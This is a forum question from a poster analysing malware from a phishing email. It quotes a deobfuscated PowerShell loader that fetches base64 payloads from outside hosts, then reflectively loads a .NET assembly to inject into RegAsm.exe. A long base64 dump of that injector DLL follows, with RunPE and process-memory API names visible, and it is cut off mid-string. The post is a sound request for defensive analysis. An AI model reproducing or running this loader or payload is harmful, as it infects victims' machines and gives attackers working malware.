-2

Recently a relative received a phishing email with an encrypted code, Even though I do not know that much about it, I tried to review what did the script made to revert whatever it was done. In the end, it translated into the few lines of code that are below, I believe it's dotnet and it's trying to download a set of commands to be run on a local machine. The code is the following:

b"$dll = '0/L00dc/r/ee.etsap//:sptth';
$RumpeD = (New-Object Net.WebClient).DownloadString( $dll[-1..-$dll.Length] -join '' );
$Fi = 'txt.34612474295/sbv/erots.sbvle//:ptth';
$FiRe = (New-Object Net.WebClient).DownloadString( $Fi[-1..-$Fi.Length] -join '' );
[Byte[]] $Rumpe = [System.Convert]::FromBase64String( $RumpeD[-1..-$RumpeD.Length] -join '' );
[Byte[]] $server = [System.Convert]::FromBase64String( $FiRe[-1..-$FiRe.Length] -join '' );
[Reflection.Assembly]::Load($Rumpe).GetType('sst.Class2').GetMethod('Run').Invoke($null, [object[]] ('C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe', $server))"

When I try to see the values for $Rumpe and $server, it returns a set of strings that I do not know what it is. Those strings are like x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08 . Can someone please translate what the $Rumpe and $server is trying to do? I would appreciate that if I'm not tagging very well the question, please help me to point it out better. I appreciate the help. Thanks

I understand no one would like to download malicious code, so, to visualize the lines, I created a python script that returns the unknown set of strings without danger to execute them:

def decode(coded):return base64.b64decode(coded)
encoded1=r'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABVabcUAAAAAAAAAAOAADiELAQYAADgAAAAGAAAAAAAAblcAAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACBXAABLAAAAAGAAACQDAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAADcVgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdDcAAAAgAAAAOAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACQDAAAAYAAAAAQAAAA6AAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAAPgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABQVwAAAAAAAEgAAAACAAUAKCwAAPwpAAADAAAAAAAAACRWAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4rAiYWKwImFgIoDQAACio+KwImFisCJhYCKA4AAAoqEzADAKAAAAABAAARKwImFisCJhYWKAgAAAY5ewAAACYgBAAAADgmAAAAcw8AAAqAAgAABHMQAAAKgAMAAAQ4NAAAACAEAAAA/g4AAP4MAABFBgAAAB4AAAAoAAAAvf///woAAAAeAAAAPgAAACADAAAAONn///9zEQAACoAEAAAEIAUAAAA4xf///3MSAAAKgAEAAAQ4kP///yYgAgAAACgJAAAGOab///8mKj4rAiYWfgEAAARvEwAACio+KwImFn4CAAAEbxQAAAoqPisCJhZ+AwAABG8VAAAKKj4rAiYWfgQAAARvFgAACioaKwImFhcqABorAiYWFioA4isCJhZ+BgAABBQoIgAACjkeAAAAcgEAAHDQCAAAAigdAAAKbyMAAApzJAAACoAGAAAEfgYAAAQqAAAAKisCJhZ+BwAABCoALisCJhYCgAcAAAQqGisCJhYXKgAaKwImFhYqAHYrAiYWKwImFnMeAAAGKCUAAAp0CQAAAoAIAAAEKgAAPisCJhYrAiYWAigmAAAKKiorAiYWfggAAAQqABorAiYWFyoAGisCJhYWKgAqKwImFigfAAAGKgATMAMAZAEAAAEAABErAiYWKwImFiACAAAAOKAAAAByHQAAcHIvAABwKAMAACuACQAABCAFAAAAFjmBAAAAJnJJAABwclUAAHAoBAAAK4ARAAAEch0AAHByfwAAcCgFAAArgBIAAAQgBwAAADhOAAAAch0AAHBynQAAcCgGAAArgAwAAARyHQAAcHLJAABwKAcAACuADQAABHIdAABwcusAAHAoCAAAK4AOAAAEODIAAAAgAgAAAP4OAAD+DAAARQgAAABb////jf///zv///9SAAAAegAAABoAAABSAAAAjAAAACgpAAAGKCgAAAY5cAAAACYgBgAAADjB////ch0AAHByCQEAcCgJAAArgAoAAARyHQAAcHI1AQBwKAoAACuACwAABCABAAAAKCgAAAY6iv///yZyHQAAcHJXAQBwKAsAACuADwAABHIdAABwcn0BAHAoDAAAK4AQAAAEONz+//8mIAAAAAAXOlD///8mKp4rAiYWDwAoJAAABg8BKCUAAAbQBQAAGygdAAAKKCcAAAooDQAAKyobMAwAgwQAAAQAABErAiYWFygpAAAGOhIAAAAmIAUAAAA4NAAAABYKOFMEAAAmIAQAAAA4IgAAABIC/hUXAAACEgP+FRYAAAI4OgAAACAFAAAA/g4XAP4MFwBFBwAAAKv///+t////DAAAAL3///8FBAAAq////xMEAAAgAgAAABY51P///yYSAtAXAAACKB0AAAooKQAACigqAAAKfRcAAAR+EgAABAJ+KwAACn4sAAAKfiwAAAoWIAQAAAh+LAAAChQSAhIDb1oAAAY6BAEAACAKAAAAOK0AAAAgswAAAI0DAAABEwYRBhYgAgABAJ4oKwAABhpAHQAAAH4NAAAECXsUAAAEEQYoLAAABjojAAAAcy0AAAp6fgwAAAQJexQAAAQRBm9CAAAGOgYAAABzLQAACnoRBh8plBMHIAAAAAA4QgAAAAMRBBzWKC0AAAYX2hMQFhMROKoAAAADEQ0fDNYoLgAAChMSAxENHxDWKC4AAAoTEzhIAQAAIAoAAAD+DhYA/gwWAEUOAAAA+AEAAIH///8W////QQAAACMCAAAVAQAATwEAACQAAAAW////MQAAAAoAAAAoAQAA/gAAAHECAAAgDAAAADi5////cy0AAAp6Ax88KCoAAAYTBCALAAAAOJ////8RExfaF9aNJgAAARMVOO0BAAAmIAQAAAA4gv///xERERA+Tf///xEMKC8AAAYTDn4PAAAECXsTAAAEEQce1hEOGhIBb04AAAY6BgAAAHMtAAAKegMRBB8o1iguAAAKEw8RCzkEAAAAEQUTDBEGHywRDBEP1p4oKwAABhpAHQAAAH4LAAAECXsUAAAEEQYoMAAABjojAAAAcy0AAAp6fgoAAAQJexQAAAQRBm86AAAGOgYAAABzLQAACnp+CQAABAl7FAAABG82AAAGFUCDAQAAIA0AAAA4xf7//wMRDR8U1iguAAAKExQgBQAAADiu/v//ERM5PgEAACAHAAAAFzqc/v//JgMRBB801iguAAAKEwUoKAAABigpAAAGOvL+//8mIAgAAAA4dP7//3MtAAAKehEFEQhAHQAAAH4RAAAECXsTAAAEEQhvVgAABjkGAAAAcy0AAAp6AxEEH1DWKC4AAAoTCQMRBB9U1igqAAAGEwoWEwt+DgAABAl7EwAABBEFEQkgADAAAB9Ab0oAAAYTDBEMOgYAAABzLQAACnp+DwAABAl7EwAABBEMAxEKEgFvTgAABjoGAAAAcy0AAAp6EQQg+AAAANYTDSABAAAAOMv9//8WEwh+EAAABAl7EwAABBEHHtYSCBoSAW9SAAAGOjz///8gBgAAADig/f//AxEUERUWERWOaSguAAAGfg8AAAQJexMAAAQRDBES1hEVERWOaRIBb04AAAY6BgAAAHMtAAAKehENHyjWEw0RERfWExEgAwAAADhS/f//cy0AAAp63U0AAAAoMQAABgl7FQAABCgyAAAGKC8AAApvMAAACigxAAAK3QAAAAAGF9YKBho+EAAAACAGAAAAKCkAAAY52/v//yYWCyADAAAAFzrN+///JioAQRwAAAAAAACWAAAAnwMAADUEAAAkAAAAKQAAARorAiYWFyoAGisCJhYWKgBOKwImFgD+CQAA/gkBACguAAAKKi4rAiYWACgyAAAKKlorAiYW/gkAAP4JAQD+CQIAb0YAAAYqAE4rAiYWAP4JAAD+CQEAKDMAAAoqfisCJhYA/gkAAP4JAQD+CQIA/gkDAP4JBAAoNAAACio+KwImFgD+CQAAKDUAAAoqWisCJhb+CQAA/gkBAP4JAgBvPgAABioAPisCJhYA/gkAACg2AAAKKj4rAiYWAP4JAAAoNwAACio+KwImFisCJhYCKBwAAAoqGzAEAFsBAAAFAAARKwImFig4AAAKChYLIAQAAAA4HAAAACDoAwAAKF0AAAY4LgAAACAEAAAA/g4FAP4MBQBFBwAAAMP////D////AAAAABAAAABFAAAAmAAAAOAAAAA4kwAAACYgBQAAADjP////KDkAAAoDbzoAAApyoQEAcChfAAAGcrsBAHBvOwAAChQUbzwAAAomBxfWCyAGAAAAOJr///84lgAAAAYHmm89AAAKKD4AAAoMCHLFAQBwbz8AAAoIctEBAHBvPwAACmA5UgAAABYNCR8eQEX///8JDRcoYgAABjp6////JiAAAAAAFzpI////JgkX1g0JHx4+0v///yg5AAAKAyheAAAGb0AAAAoWjAMAAAEUbzwAAAomOHH///8IctkBAHBvPwAACjlh////IAMAAAA4//7//wcGjmk/Yf///90SAAAAJSg2AAAKEwQoYAAABt0AAAAAAgMoJwAABioAQRwAAAAAAAAEAAAAPQEAAEEBAAASAAAAKQAAAT4rAiYWAP4JAAAoQQAACipKKwImFv4JAAD+CQEAbzoAAAoqAEorAiYW/gkAAP4JAQBvQgAACioALisCJhYAKDEAAAoqGisCJhYXKgAaKwImFhYqAEYrAiYWAgMoFwAACigYAAAKKgAALisCJhYCKBkAAAoqPisCJhbQBgAAAigTAAAGKi4rAiYWAigaAAAKKhMwAgAeAAAAAgAAESsCJhYCjAUAABs6CwAAACgBAAArCjgCAAAAAgoGKgAAMisCJhYD/hUFAAAbKgAAAD4rAiYWKwImFgIoHAAACioaKwImFhcqABorAiYWFioAPisCJhYA/gkAACgdAAAKKhMwAwAvAAAAAwAAESsCJhYCex4AAApvHwAACgoGjAgAABs6EgAAACgCAAArCgJ7HgAACgZvIAAACgYqAGorAiYWKwImFgIoHAAACgJzIQAACn0eAAAKKgAaKwImFhcqABorAiYWFioAQlNKQgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAAtBEAACN+AAAgEgAABBAAACNTdHJpbmdzAAAAACQiAADkAQAAI1VTAAgkAAAQAAAAI0dVSUQAAAAYJAAA5AUAACNCbG9iAAAAAAAAAAIAAAFXtaIdCQ8AAAAAAAAAAAAAAQAAAEAAAAAYAAAAHwAAAGIAAACOAAAASwAAAEAAAAADAAAAAgAAAAUAAAAFAAAACQAAAAoAAAABAAAACAAAAAIAAAABAAAAAwAAAAEAAAAOAAAABAAAAA0AAAAAANcBAQAAAAAABgAHACcABgBWAFsABgBiAFsABgBoAFsABgBwACcABgCOAKIAGwC1AAAABgDEANsABgDtAFsABgD0ANsABgARAdsABgAqAdsABgBDAdsABgBeAdsABgB5AY0BBgCsAY0BBgC6AdsABgD9AVsACgAZAikCCgB0An0CDgD0AgwDBgBTA1sABgBmBFsACgDMBCkCBgCDBScABgC1BVsABgDhBVsABgBHBlsACgB1BoQGBgAABxAHBgAxBz0HBgCDB9sADgDoBwwDBgASCVsABgBdCY0BBgCDCVsACgCMCZgJBgDfCVsABgDzCVsABgAEClsABgAWClsABgAgClsADgA1CqIACgBRCpgJBgDxClsABgASC1sABgAjC1sABgC0C1sABgDIC1sABgCkDVsABgDPDdsABgDaDdsACgD1DVMCBgAuDjUODgDDDtoODgDyDgsPDgAhDwsPBgA2D6IACgBOD5gJCgBmD1MCDgB+D5MPBgCwD6IABgDNDycACgDoD1MCAAAAAOEBAAAAAAEAAQCAARAA6gEAAEkAAQABAAAAAAAEAhICTQABAAEAAAAAAGkCEgJRAAEAAgAAARAAmwISAkkAAQADAAUBAAClAgAASQAFAAoABQEAALMCAABJAAUAFAAAAQAAzgLYAkkABgAYAAABEADpAhICVQAIAB0AAAEAACEDEgJJAAkAIgAAARAANAM6A0kACQAjAAMBAAA+AwAAWQATADMAAwEAAGUDAABZABMANwADAQAAgwMAAFkAEwA7AAMBAACcAwAAWQATAD8AAwEAALoDAABZABMAQwADAQAA0wMAAFkAEwBHAAMBAADqAwAAWQATAEsAAwEAAAUE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AAAKAFsAAAAAAAAAAAABAAAAqw4AAAYABQAHAAUADAALAA0ACwAOAAsADwALABAACwARAAsAEgALABMACwAUAAsAFQALABYACwAXAAsAAAAQAA4A1gUAABAAHQDWBQAAAAAfANYFAAAAAE0ARwk3ADwBNwBuAUwA8wFMAPgBTAD9AUwAAgJMAAcCTAAMAkwAEQJMABYCTAAbAkwAIAJRADwBAAAAUnVtcGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAG1zY29ybGliAC5jdG9yAFZvaWQAU3lzdGVtAEludDMyAEJvb2xlYW4AUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBTeXN0ZW0uRGlhZ25vc3RpY3MARGVidWdnaW5nTW9kZXMAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTeXN0ZW0uUmVmbGVjdGlvbgBTdHJpbmcAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAEd1aWRBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBSdW1wZS5kbGwAPE1vZHVsZT4AcWs5M2hSN0FjTmppYkh4b0haAE9iamVjdABNeUFwcGxpY2F0aW9uAHNzdC5NeQBBcHBsaWNhdGlvbkJhc2UATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljAE15Q29tcHV0ZXIAQ29tcHV0ZXIATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMATXlQcm9qZWN0AE15V2ViU2VydmljZXMAVGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDEAUmVzb3VyY2VzAHNzdC5NeS5SZXNvdXJjZXMATXlTZXR0aW5ncwBBcHBsaWNhdGlvblNldHRpbmdzQmFzZQBTeXN0ZW0uQ29uZmlndXJhdGlvbgBNeVNldHRpbmdzUHJvcGVydHkAUnVuUEUAc3N0AERlbGVnYXRlUmVzdW1lVGhyZWFkAE11bHRpY2FzdERlbGVnYXRlAERlbGVnYXRlV293NjRTZXRUaHJlYWRDb250ZXh0AERlbGVnYXRlU2V0VGhyZWFkQ29udGV4dABEZWxlZ2F0ZVdvdzY0R2V0VGhyZWFkQ29udGV4dABEZWxlZ2F0ZUdldFRocmVhZENvbnRleHQARGVsZWdhdGVWaXJ0dWFsQWxsb2NFeABEZWxlZ2F0ZVdyaXRlUHJvY2Vzc01lbW9yeQBEZWxlZ2F0ZVJlYWRQcm9jZXNzTWVtb3J5AERlbGVnYXRlWndVbm1hcFZpZXdPZlNlY3Rpb24ARGVsZWdhdGVDcmVhdGVQcm9jZXNzQQBQcm9jZXNzSW5mb3JtYXRpb24AVmFsdWVUeXBlAFN0YXJ0dXBJbmZvcm1hdGlvbgBDbGFzczIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAVXNlcgBtX015V2ViU2VydmljZXNPYmplY3RQcm92aWRlcgAuY2N0b3IAZ2V0X0NvbXB1dGVyAGdldF9HZXRJbnN0YW5jZQBnZXRfQXBwbGljYXRpb24AZ2V0X1VzZXIAZ2V0X1dlYlNlcnZpY2VzAE52d09WSlBLVGw0dlcxcHAzVgBCdW5MTVVSUUZQblVzazBLUk4AQXBwbGljYXRpb24AV2ViU2VydmljZXMARXF1YWxzAG8AUnVudGltZUhlbHBlcnMAR2V0T2JqZWN0VmFsdWUAR2V0SGFzaENvZGUAR2V0VHlwZQBUeXBlAFRvU3RyaW5nAENyZWF0ZV9fSW5zdGFuY2VfXwBUAGluc3RhbmNlAEFjdGl2YXRvcgBDcmVhdGVJbnN0YW5jZQBEaXNwb3NlX19JbnN0YW5jZV9fAElibTlkVnNHVnBpeWJSYlZJeQB0UHR5alpEUVNqcmJsS0EwdFgARjJhd2dLTWJTck5iT0tjTjl1AFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAG1fQ29udGV4dABDb250ZXh0VmFsdWVgMQBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABnZXRfVmFsdWUAc2V0X1ZhbHVlAEo2WEZnbEpwMThRRkQzWkE5dQBIdWlWWDZpdXlPY3J4VTc2QjAAR2V0SW5zdGFuY2UAcmVzb3VyY2VNYW4AUmVzb3VyY2VNYW5hZ2VyAFN5c3RlbS5SZXNvdXJjZXMAcmVzb3VyY2VDdWx0dXJlAEN1bHR1cmVJbmZvAFN5c3RlbS5HbG9iYWxpemF0aW9uAGdldF9SZXNvdXJjZU1hbmFnZXIAUmVmZXJlbmNlRXF1YWxzAGdldF9Bc3NlbWJseQBBc3NlbWJseQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQBWYWx1ZQBLYWpxUzdiSjIwN25ST2J5RncAWGRZSHlvaHBaSmRxOGhpMGRFAEN1bHR1cmUAZGVmYXVsdEluc3RhbmNlAFNldHRpbmdzQmFzZQBTeW5jaHJvbml6ZWQAZ2V0X0RlZmF1bHQAUjBrdnE3RXFReXYyZXk0bGtSAFR5b3FzeGZ2M0RFYUFWbWh0eABEZWZhdWx0AGdldF9TZXR0aW5ncwBTZXR0aW5ncwBSZXN1bWVUaHJlYWQAV293NjRTZXRUaHJlYWRDb250ZXh0AFNldFRocmVhZENvbnRleHQAV293NjRHZXRUaHJlYWRDb250ZXh0AEdldFRocmVhZENvbnRleHQAVmlydHVhbEFsbG9jRXgAV3JpdGVQcm9jZXNzTWVtb3J5AFJlYWRQcm9jZXNzTWVtb3J5AFp3VW5tYXBWaWV3T2ZTZWN0aW9uAENyZWF0ZVByb2Nlc3NBAExvYWRMaWJyYXJ5QQBJbnRQdHIATmFtZQBrZXJuZWwzMgBHZXRQcm9jQWRkcmVzcwBoUHJvY2VzcwBMb2FkQXBpAENyZWF0ZUFwaQBuYW1lAG1ldGhvZABNYXJzaGFsAEdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyAERlbGVnYXRlAENvbnZlcnNpb25zAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFRvR2VuZXJpY1BhcmFtZXRlcgBFeGVjdXRlAHBhdGgAQnl0ZQBwYXlsb2FkAFNpemVPZgBDb252ZXJ0AFRvVUludDMyAFVJbnQzMgBFbXB0eQBaZXJvAEV4Y2VwdGlvbgBCaXRDb252ZXJ0ZXIAVG9JbnQzMgBQcm9jZXNzAEdldFByb2Nlc3NCeUlkAEtpbGwAUHJvamVjdERhdGEAQ2xlYXJQcm9qZWN0RXJyb3IAS01WSm80Z2tyUEpISk1JZGFJAGxHNGdCOWxKY1h4M1JyaHNYWgBFYUtiUzZBYkprTWR5aDVWVTEARDJ5UDlJcW1TYXVxY0V3VnlvAGdldF9TaXplAFFmMkhWV0d5UFpta2Y5eEtLUAB0aHJlYWQATHBZb0FPQk1FdERNWmw0UmpXAEludDE2AFRvSW50MTYAcGpDQnRvSFpmbzJPaFhSTXJnAEJ1ZmZlcgBCbG9ja0NvcHkAQXJyYXkARlppZHNKTkY4MktCRlZxRzUwAEdldEJ5dGVzAGNrd1FLTnRhSEk1VmZFM292QwBEUUNPdE4yTmYxZDNNdVh5V0MAU2V0UHJvamVjdEVycm9yAFdQTGpUcDU3Z3lST2w5dThBQgBUYXJnZXRPYmplY3QAVGFyZ2V0TWV0aG9kAEJlZ2luSW52b2tlAElBc3luY1Jlc3VsdABoYW5kbGUAQXN5bmNDYWxsYmFjawBEZWxlZ2F0ZUNhbGxiYWNrAERlbGVnYXRlQXN5bmNTdGF0ZQBFbmRJbnZva2UARGVsZWdhdGVBc3luY1Jlc3VsdABJbnZva2UAY29udGV4dABhZGRyZXNzAGxlbmd0aAB0eXBlAHByb3RlY3QAcHJvY2VzcwBiYXNlQWRkcmVzcwBidWZmZXIAYnVmZmVyU2l6ZQBieXRlc1dyaXR0ZW4AYnl0Z